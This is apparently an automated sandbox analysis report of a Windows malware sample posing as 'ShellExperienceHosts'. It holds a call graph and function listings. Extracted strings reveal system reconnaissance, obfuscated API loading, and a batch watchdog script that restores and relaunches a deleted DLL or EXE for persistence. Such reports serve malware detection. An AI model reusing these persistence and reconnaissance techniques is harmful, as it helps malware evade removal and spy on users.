6c6d0429 WinExec Sleep 129463->129465 129477 6c6d047f std::ios_base::_Ios_base_dtor 129463->129477 129466 6c6b9714 30 API calls 129464->129466 129467 6c6d0446 DeleteFileA 129465->129467 129468 6c6d0a94 129466->129468 129471 6c6d0466 DeleteFileA 129467->129471 129470 6c6b9714 30 API calls 129468->129470 129472 6c6d0aa0 129470->129472 129471->129477 129474 6c6b9714 30 API calls 129472->129474 129475 6c6d0aac 129474->129475 129476 6c6b9714 30 API calls 129475->129476 129478 6c6d0ab8 129476->129478 129477->129462 129490 6c6d0873 std::ios_base::_Ios_base_dtor 129477->129490 129479 6c6b9714 30 API calls 129478->129479 129480 6c6d0ac4 129479->129480 129481 6c6b9714 30 API calls 129480->129481 129482 6c6d0ad0 129481->129482 129483 6c6b9714 30 API calls 129482->129483 129484 6c6d0adc 129483->129484 129485 6c6b9714 30 API calls 129484->129485 129486 6c6d0ae8 129485->129486 129487 6c6b9714 30 API calls 129486->129487 129488 6c6d0af4 129487->129488 129489 6c6b9714 30 API calls 129488->129489 129491 6c6d0b00 129489->129491 129492 6c6b9714 30 API calls 129491->129492 129493 6c6d0b0c 129492->129493 129494 6c6b9714 30 API calls 129493->129494 129495 6c6d0b18 129494->129495 129496 6c6b9714 30 API calls 129495->129496 129497 6c6d0b24 129496->129497 129498 6c6b9714 30 API calls 129497->129498 129499 6c6d0b30 129498->129499 129500 6c6b9714 30 API calls 129499->129500 129501 6c6d0b3c 129500->129501 129502 6c6b9714 30 API calls 129501->129502 129503 6c6d0b48 129502->129503 129504 6c6b9714 30 API calls 129503->129504 129505 6c6d0b54 129504->129505 129506 6c6b9714 30 API calls 129505->129506 129507 6c6d0b60 129506->129507 129508 6c6b9714 30 API calls 129507->129508 129509 6c6d0b6c 129508->129509 129510 6c6b9714 30 API calls 129509->129510 129511 6c6d0b78 129510->129511 129512 6c6b9714 30 API calls 129511->129512 129513 6c6d0b84 129512->129513 129514 6c6cd618 129515 6c6cd65f 129514->129515 129516 6c6c2098 98 API calls 129515->129516 129517 6c6cd671 129516->129517 129518 6c6cd6ad 129517->129518 129524 6c6cd6e4 129517->129524 129529 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129518->129529 129521 6c6cd6b4 129522 6c6cd6a6 129528 6c6bc394 72 API calls 129522->129528 129525 6c6cd720 129524->129525 129526 6c6cd756 129525->129526 129530 6c6becb6 129525->129530 129526->129522 129528->129518 129529->129521 129531 6c6bece1 _Yarn 129530->129531 129532 6c86009d 69 API calls 129531->129532 129533 6c6bf18f 129531->129533 129532->129531 129533->129526 129534 10004274 129535 1001f814 CreateThread 129534->129535 129537 10006110 129535->129537 129537->129537 129538 1001f63d send 129539 6c6bae95 129543 6c6baea3 std::ios_base::_Ios_base_dtor _strlen 129539->129543 129540 6c6bbd90 129541 6c85c237 29 API calls 129540->129541 129544 6c6bbd95 129541->129544 129542 6c6bbda9 129545 6c6b9714 30 API calls 129542->129545 129543->129540 129543->129542 129548 6c6bb00d 129543->129548 129549 6c6bb002 129543->129549 129559 6c6bafb4 _Yarn 129543->129559 129546 6c6b9714 30 API calls 129544->129546 129547 6c6bbdb8 129545->129547 129551 6c6bbd9a 129546->129551 129552 6c6b9714 30 API calls 129547->129552 129550 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129548->129550 129647 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129549->129647 129550->129559 129554 6c6b9714 30 API calls 129551->129554 129555 6c6bbdc7 129552->129555 129554->129542 129556 6c6b9714 30 API calls 129555->129556 129558 6c6bbdd6 129556->129558 129557 6c6bbe0d 129561 6c6b9714 30 API calls 129557->129561 129562 6c6b9714 30 API calls 129558->129562 129559->129557 129560 6c6bb08d 129559->129560 129569 6c6bbc9d 129559->129569 129579 6c6bb09d std::ios_base::_Ios_base_dtor _Yarn 129559->129579 129648 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129560->129648 129564 6c6bbe1c 129561->129564 129565 6c6bbddb 129562->129565 129567 6c6b9714 30 API calls 129564->129567 129566 6c6b9714 30 API calls 129565->129566 129568 6c6bbde0 129566->129568 129570 6c6bbe2b 129567->129570 129571 6c6b9714 30 API calls 129568->129571 129572 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129569->129572 129574 6c6b9714 30 API calls 129570->129574 129575 6c6bbdef 129571->129575 129572->129579 129573 6c6bb20a CopyFileA 129585 6c6bb218 _strlen 129573->129585 129576 6c6bbe3a 129574->129576 129577 6c6b9714 30 API calls 129575->129577 129578 6c6b9714 30 API calls 129576->129578 129580 6c6bbdfe 129577->129580 129581 6c6bbe49 129578->129581 129579->129540 129579->129573 129583 6c6b9714 30 API calls 129580->129583 129582 6c6b9714 30 API calls 129581->129582 129584 6c6bbe58 129582->129584 129583->129557 129586 6c6b9714 30 API calls 129584->129586 129585->129547 129587 6c6bb2e8 129585->129587 129588 6c6bb2dd 129585->129588 129594 6c6bb286 _Yarn 129585->129594 129589 6c6bbe67 129586->129589 129591 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129587->129591 129649 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129588->129649 129592 6c6bc08c 29 API calls 129589->129592 129591->129594 129593 6c6bbe82 129592->129593 129594->129564 129595 6c6bb34c 129594->129595 129597 6c6bbd18 129594->129597 129600 6c6bb358 std::ios_base::_Ios_base_dtor _Yarn 129594->129600 129650 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129595->129650 129598 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129597->129598 129598->129600 129599 6c6bb4ef CopyFileA 129601 6c6bb4fd _strlen 129599->129601 129600->129540 129600->129599 129601->129555 129602 6c6bb5f8 129601->129602 129603 6c6bb5ed 129601->129603 129607 6c6bb59f _Yarn 129601->129607 129605 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129602->129605 129651 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129603->129651 129605->129607 129606 6c6bb676 129652 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129606->129652 129607->129570 129607->129606 129609 6c6bbcc3 129607->129609 129612 6c6bb686 std::ios_base::_Ios_base_dtor _Yarn 129607->129612 129611 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129609->129611 129610 6c6c4700 98 API calls 129616 6c6bb7f9 std::ios_base::_Ios_base_dtor 129610->129616 129611->129612 129612->129540 129612->129610 129613 6c6bb888 CreateProcessA 129615 6c6bbbd6 129613->129615 129621 6c6bb8cc _strlen 129613->129621 129661 6c6bc894 72 API calls std::ios_base::_Ios_base_dtor 129615->129661 129616->129540 129616->129613 129653 6c6c4a00 17 API calls 129616->129653 129617 6c6bb868 129654 6c6bc572 72 API calls 129617->129654 129620 6c6bb870 129620->129613 129622 6c6bb877 129620->129622 129621->129568 129626 6c6bb950 129621->129626 129627 6c6bb945 129621->129627 129634 6c6bb8f7 _Yarn 129621->129634 129655 6c6ba07c OpenProcess CloseHandle 129622->129655 129625 6c6bbbde std::ios_base::_Ios_base_dtor 129625->129540 129632 6c6bbc55 std::ios_base::_Ios_base_dtor 129625->129632 129628 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129626->129628 129656 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129627->129656 129628->129634 129629 6c6bbc71 129630 6c6bb87d 129630->129613 129630->129615 129662 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129632->129662 129633 6c6bb9ce 129657 6c6b971e 30 API calls Concurrency::details::ExternalContextBase::~ExternalContextBase 129633->129657 129634->129584 129634->129633 129636 6c6bbd3e 129634->129636 129642 6c6bb9de std::ios_base::_Ios_base_dtor _Yarn 129634->129642 129638 6c6e1139 Concurrency::details::ExternalContextBase::~ExternalContextBase 3 API calls 129636->129638 129637 6c6c2098 98 API calls 129639 6c6bbb4d 129637->129639 129638->129642 129639->129540 129640 6c6bbb74 std::ios_base::_Ios_base_dtor 129639->129640 129641 6c6bbbb5 CloseHandle CloseHandle 129639->129641 129640->129639 129658 6c6bc656 17 API calls 129640->129658 129660 6c6bc810 72 API calls std::ios_base::_Ios_base_dtor 129641->129660 129642->129540 129642->129637 129645 6c6bbbaa 129659 6c6bc394 72 API calls 129645->129659 129647->129559 129648->129579 129649->129594 129650->129600 129651->129607 129652->129612 129653->129617 129654->129620 129655->129630 129656->129634 129657->129642 129658->129645 129659->129641 129660->129615 129661->129625 129662->129629

                                                                            Executed Functions

                                                                            Function 03325430 Relevance: 93.2, APIs: 40, Strings: 13, Instructions: 440stringnetworklibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 3325430-33254b7 call 332f707 call 3336770 * 3 gethostname gethostbyname 9 332555c-332569d MultiByteToWideChar * 2 GetLastInputInfo GetTickCount wsprintfW MultiByteToWideChar * 2 call 3327490 GetSystemInfo wsprintfW call 3326c50 call 3326ee0 GetForegroundWindow 0->9 10 33254bd-3325504 inet_ntoa call 33303cf * 2 0->10 23 33256b2-33256c0 9->23 24 332569f-33256ac GetWindowTextW 9->24 10->9 20 3325506-3325508 10->20 22 3325510-332555a inet_ntoa call 33303cf * 2 20->22 22->9 26 33256c2 23->26 27 33256cc-33256f0 lstrlenW call 3326d70 23->27 24->23 26->27 33 3325702-3325726 call 332f876 27->33 34 33256f2-33256ff call 332f876 27->34 39 3325732-3325756 lstrlenW call 3326d70 33->39 40 3325728 33->40 34->33 43 3325768-33257b9 GetModuleHandleW GetProcAddress 39->43 44 3325758-3325765 call 332f876 39->44 40->39 46 33257c6-33257cd GetSystemInfo 43->46 47 33257bb-33257c4 GetNativeSystemInfo 43->47 44->43 49 33257d3-33257e1 46->49 47->49 50 33257e3-33257eb 49->50 51 33257ed-33257f2 49->51 50->51 52 33257f4 50->52 53 33257f9-3325820 wsprintfW call 3326a70 GetCurrentProcessId 51->53 52->53 56 3325822-332583c OpenProcess 53->56 57 3325885-332588c call 3326690 53->57 56->57 58 332583e-3325853 K32GetProcessImageFileNameW 56->58 65 332589e-33258ab 57->65 66 332588e-332589c 57->66 60 3325855-332585c 58->60 61 332585e-3325866 call 33280f0 58->61 63 332587f CloseHandle 60->63 68 332586b-332586d 61->68 63->57 67 33258ac-33259a1 call 332f876 call 3326490 call 3326150 call 332fc0e GetTickCount call 333043c call 33303a8 wsprintfW GetLocaleInfoW GetSystemDirectoryW GetCurrentHwProfileW 65->67 66->67 83 33259a3-33259c8 67->83 84 33259ca-33259e9 67->84 70 3325878-332587e 68->70 71 332586f-3325876 68->71 70->63 71->63 85 33259ea-3325a2e call 3325a30 call 3323160 call 332efff call 332f00a 83->85 84->85
                                                                            APIs
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • _memset.LIBCMT ref: 0332546C
                                                                            • _memset.LIBCMT ref: 03325485
                                                                            • _memset.LIBCMT ref: 03325495
                                                                            • gethostname.WS2_32(?,00000032), ref: 033254A3
                                                                            • gethostbyname.WS2_32(?), ref: 033254AD
                                                                            • inet_ntoa.WS2_32 ref: 033254C5
                                                                            • _strcat_s.LIBCMT ref: 033254D8
                                                                            • _strcat_s.LIBCMT ref: 033254F1
                                                                            • inet_ntoa.WS2_32 ref: 0332551A
                                                                            • _strcat_s.LIBCMT ref: 0332552D
                                                                            • _strcat_s.LIBCMT ref: 03325546
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03325573
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000002,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 03325587
                                                                            • GetLastInputInfo.USER32(?), ref: 0332559A
                                                                            • GetTickCount.KERNEL32 ref: 033255A0
                                                                            • wsprintfW.USER32 ref: 033255D5
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 033255E8
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000296,00000000), ref: 033255FC
                                                                            • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 03325653
                                                                            • wsprintfW.USER32 ref: 0332566C
                                                                            • GetForegroundWindow.USER32 ref: 03325695
                                                                            • GetWindowTextW.USER32(00000000,000006CE,000000FA), ref: 033256AC
                                                                            • lstrlenW.KERNEL32(000008CC), ref: 033256D3
                                                                            • lstrlenW.KERNEL32(00000994), ref: 03325739
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 033257AA
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 033257B1
                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 033257C2
                                                                            • GetSystemInfo.KERNEL32(?), ref: 033257CD
                                                                            • wsprintfW.USER32 ref: 03325806
                                                                            • GetCurrentProcessId.KERNEL32 ref: 03325818
                                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 0332582E
                                                                            • K32GetProcessImageFileNameW.KERNEL32(00000000,?,00000104), ref: 0332584B
                                                                            • CloseHandle.KERNEL32(03345164), ref: 0332587F
                                                                            • GetTickCount.KERNEL32 ref: 033258E9
                                                                            • __time64.LIBCMT ref: 033258F8
                                                                            • __localtime64.LIBCMT ref: 0332592F
                                                                            • wsprintfW.USER32 ref: 03325968
                                                                            • GetLocaleInfoW.KERNEL32(00000800,00000002,00000F46,00000040), ref: 0332597D
                                                                            • GetSystemDirectoryW.KERNEL32(00001184,00000032), ref: 0332598C
                                                                            • GetCurrentHwProfileW.ADVAPI32(?), ref: 03325999
                                                                              • Part of subcall function 033280F0: GetLogicalDriveStringsW.KERNEL32(000003E8,?,75BF73E0,00000AD4,00000000), ref: 03328132
                                                                              • Part of subcall function 033280F0: lstrcmpiW.KERNEL32(?,A:\), ref: 03328166
                                                                              • Part of subcall function 033280F0: lstrcmpiW.KERNEL32(?,B:\), ref: 03328176
                                                                              • Part of subcall function 033280F0: QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 033281A6
                                                                              • Part of subcall function 033280F0: lstrlenW.KERNEL32(?), ref: 033281B7
                                                                              • Part of subcall function 033280F0: __wcsnicmp.LIBCMT ref: 033281CE
                                                                              • Part of subcall function 033280F0: lstrcpyW.KERNEL32(00000AD4,?), ref: 03328204
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3543532593.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true
                                                                            • Associated: 00000003.00000002.3543532593.0000000003354000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_3320000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: Info$ByteCharMultiSystemWide_strcat_swsprintf$Process_memsetlstrlen$CountCurrentHandleTickWindowinet_ntoalstrcmpi$AddressCloseDeviceDirectoryDriveFileForegroundImageInputLastLocaleLogicalModuleNameNativeOpenProcProfileQueryStringsText__localtime64__time64__wcsnicmp_mallocgethostbynamegethostnamelstrcpy
                                                                            • String ID: %d min$1.0$2024.11.26$AppEvents$GROUP$GetNativeSystemInfo$Network$REMARK$X86$X86 %s$kernel32.dll$x64$x86
                                                                            • API String ID: 1101047656-915692967
                                                                            • Opcode ID: a248940dcd263fc247aaa6edb31c06358b4c3f2e0eb9c7f3bf364f9254225bbd
                                                                            • Instruction ID: d6531414becaa3aecc44a1a1e55149b7a1d3324c019e0e407e1133dfe84c8a16
                                                                            • Opcode Fuzzy Hash: a248940dcd263fc247aaa6edb31c06358b4c3f2e0eb9c7f3bf364f9254225bbd
                                                                            • Instruction Fuzzy Hash: 48F181B5A40314AFE724EB64CCC5FABB7B8AF45700F008558F61AA7281EB70BA44CF55
                                                                            Function 6C6BA265 Relevance: 71.3, APIs: 12, Strings: 28, Instructions: 1314COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: _strlen
                                                                            • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.bat$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($itor$set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                            • API String ID: 4218353326-3990156688
                                                                            • Opcode ID: 293d41a6966df1380ba3188c7b215007540ee3e9c66ff4c366e1a7a8e83b086c
                                                                            • Instruction ID: 59cd1b6e0e83201055e6b17d53d43f2b830cc1f2f78d492020f453125bee678d
                                                                            • Opcode Fuzzy Hash: 293d41a6966df1380ba3188c7b215007540ee3e9c66ff4c366e1a7a8e83b086c
                                                                            • Instruction Fuzzy Hash: 2DB2BFB1A00B009BD324CF38C8D4BA6B7E5BF89308F144A2DD4A797B91EB31F5558B59
                                                                            Function 02230032 Relevance: 70.8, APIs: 2, Strings: 38, Instructions: 795memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetNativeSystemInfo.KERNEL32(?), ref: 022304AE
                                                                            • VirtualAlloc.KERNEL32(?,?,00003000,00000004), ref: 022304DE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3542377885.0000000002230000.00000040.00001000.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_2230000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID: AllocInfoNativeSystemVirtual
                                                                            • String ID: A$A$Cach$F$Fu$G$Li$Lo$P$Rt$S$Syst$Ta$Vi$Via$a$a$a$a$b$b$ctio$ee$fo$iv$mI$o$oc$otec$p$st$t$tNat$tu$tu$ucti$ushI$yA
                                                                            • API String ID: 2032221330-2899676511
                                                                            • Opcode ID: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                            • Instruction ID: 9c4aa92bbfb6651813ab6dcf3dc313f7f3355b04c5e72397f80aec3c880def4b
                                                                            • Opcode Fuzzy Hash: 82ef88a58992c726dca534e4f3eff6f5ce2a19202078a525a2214f4ed1b422dd
                                                                            • Instruction Fuzzy Hash: 9B629CB25183868FD731CF64C840BABBBE4FF94704F04482EE5C99B255E7749A48CB66
                                                                            Function 6C6BA1AE Relevance: 68.5, APIs: 12, Strings: 26, Instructions: 1962COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                            • API String ID: 0-143597532
                                                                            • Opcode ID: bba8782362a19a64904c06477d3f483a4914a0bc7d04870677456d05740626eb
                                                                            • Instruction ID: edb06663f8e58f0f383c621ff285266854a592ffdc4b19dc64370dcb83b21bcc
                                                                            • Opcode Fuzzy Hash: bba8782362a19a64904c06477d3f483a4914a0bc7d04870677456d05740626eb
                                                                            • Instruction Fuzzy Hash: B4F2AEB1A00B009BD325CF38C8C4AA7B7E5FF99308F148A2DD49A97B41E731F5598B59
                                                                            Function 6C6BA1EE Relevance: 67.9, APIs: 12, Strings: 26, Instructions: 1383COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.3544653354.000000006C6B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C6B0000, based on PE: true
                                                                            • Associated: 00000003.00000002.3544627307.000000006C6B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544873566.000000006C887000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544959442.000000006C8EA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3544984378.000000006C8ED000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545010839.000000006C8F0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545035492.000000006C8F3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C8F8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            • Associated: 00000003.00000002.3545060323.000000006C9A7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_6c6b0000_ShellExperienceHosts.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .batkup.$.battor.$ copy /Y "%BackupDLLPath%" "%DLLPath%"$ copy /Y "%BackupProcessPath%" "%ProcessPath%"$ echo DLL file not found, restoring from backup...$ echo Process file not found, restoring from backup...$ start "" "%ProcessPath%"$.batitor$.pid$:CheckProcess$@echo off$Failed to create backup DLL. Please check the DLL path: $Failed to create backup EXE. Please check the EXE path: $cmd.exe /B /c "%s"$goto CheckProcess$if %ERRORLEVEL% neq 0 ($if not exist "%DLLPath%" ($if not exist "%ProcessPath%" ($set "BackupDLLPath=$set "BackupProcessPath=$set "DLLPath=$set "ProcessName=$set "ProcessPath=$tasklist /FI "IMAGENAME eq %ProcessName%" | findstr /I "%ProcessName%" >nul$timeout /t 30 /nobreak >nul$tor.
                                                                            • API String ID: 0-143597532
                                                                            • Opcode ID: 47cedaf6762367846ce843261faeb5c6a20e1139c6c2ec1eacf5ce0154ff6411
                                                                            • Instruction ID: 50fb48fcd471eb17fd3f962d020ce01f7899f12a48e9808d5703cfa69da39474
                                                                            • Opcode Fuzzy Hash: 47cedaf6762367846ce843261faeb5c6a20e1139c6c2ec1eacf5ce0154ff6411
                                                                            • Instruction Fuzzy Hash: 8EC2BEB1A00B009BD324CF38C8D4BA6B7E5BF89308F144A2DD4A797B91E731F5598B59
                                                                            Function 0332DF10 Relevance: 61.6, APIs: 24, Strings: 11, Instructions: 354sleepregistrysynchronizationCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2225 332df10-332df72 call 3330542 Sleep 2228 332df97-332df9d 2225->2228 2229 332df74-332df91 call 332f707 call 332fa29 CloseHandle 2225->2229 2231 332dfa4-332e019 GetLocalTime wsprintfW SetUnhandledExceptionFilter call 332fa29 CloseHandle call 332f707 2228->2231 2232 332df9f call 3327620 2228->2232 2229->2228 2241 332e01b-332e026 call 3322c90 2231->2241 2242 332e028 2231->2242 2232->2231 2244 332e02c-332e046 call 332f707 2241->2244 2242->2244 2248 332e054 2244->2248 2249 332e048-332e049 call 3329730 2244->2249 2251 332e058 2248->2251 2253 332e04e-332e052 2249->2253 2252 332e063-332e06f call 332ce00 2251->2252 2256 332e071-332e0b7 call 332f876 * 2 2252->2256 2257 332e0b9-332e0fa call 332f876 * 2 2252->2257 2253->2251 2266 332e100-332e110 2256->2266 2257->2266 2267 332e152-332e15a 2266->2267 2268 332e112-332e14c call 332ce00 call 332f876 * 2 2266->2268 2269 332e162-332e169 2267->2269 2270 332e15c-332e15e 2267->2270 2268->2267 2273 332e177-332e17b 2269->2273 2274 332e16b-332e175 2269->2274 2270->2269 2276 332e181-332e187 2273->2276 2274->2276 2278 332e1c6-332e1ee call 3330542 call 3322da0 2276->2278 2279 332e189-332e1a3 EnumWindows 2276->2279 2286 332e200-332e2ac call 3330542 CreateEventA call 332f876 call 332ca70 2278->2286 2287 332e1f0-332e1fb Sleep 2278->2287 2279->2278 2281 332e1a5-332e1c4 Sleep EnumWindows 2279->2281 2281->2278 2281->2281 2295 332e2b7-332e2bd 2286->2295 2287->2252 2296 332e318-332e337 call 3325430 2295->2296 2297 332e2bf-332e2f3 Sleep RegOpenKeyExW 2295->2297 2302 332e36a-332e370 2296->2302 2303 332e339-332e365 CloseHandle 2296->2303 2299 332e311-332e316 2297->2299 2300 332e2f5-332e30b RegQueryValueExW 2297->2300 2299->2295 2299->2296 2300->2299 2304 332e372-332e38e call 332fa29 2302->2304 2305 332e390 2302->2305 2303->2252 2308 332e394 2304->2308 2305->2308 2310 332e396-332e39d 2308->2310 2311 332e39f-332e3ae Sleep 2310->2311 2312 332e40d-332e420 2310->2312 2311->2310 2313 332e3b0-332e3b7 2311->2313 2316 332e432-332e46c call 3330542 Sleep CloseHandle 2312->2316 2317 332e422-332e42c WaitForSingleObject CloseHandle 2312->2317 2313->2312 2314 332e3b9-332e3cb 2313->2314 2320 332e3dd-332e408 Sleep CloseHandle 2314->2320 2321 332e3cd-332e3d7 WaitForSingleObject CloseHandle 2314->2321 2316->2252 2317->2316 2320->2252 2321->2320
                                                                            APIs
                                                                              • Part of subcall function 03330542: __fassign.LIBCMT ref: 03330538
                                                                            • Sleep.KERNEL32(00000000), ref: 0332DF64
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0332DF91
                                                                            • GetLocalTime.KERNEL32(?), ref: 0332DFA9
                                                                            • wsprintfW.USER32 ref: 0332DFE0
                                                                            • SetUnhandledExceptionFilter.KERNEL32(033275B0), ref: 0332DFEE
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0332E007
                                                                              • Part of subcall function 0332F707: _malloc.LIBCMT ref: 0332F721
                                                                            • EnumWindows.USER32(03325CC0,?), ref: 0332E19D
                                                                            • Sleep.KERNEL32(00004E20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0332E1AA
                                                                            • EnumWindows.USER32(03325CC0,?), ref: 0332E1BE
                                                                            • Sleep.KERNEL32(00000BB8), ref: 0332E1F5
                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0332E241
                                                                            • Sleep.KERNEL32(00000FA0), ref: 0332E2C4
                                                                            • RegOpenKeyExW.KERNEL32(80000001,Console,00000000,00020019,?), ref: 0332E2EB
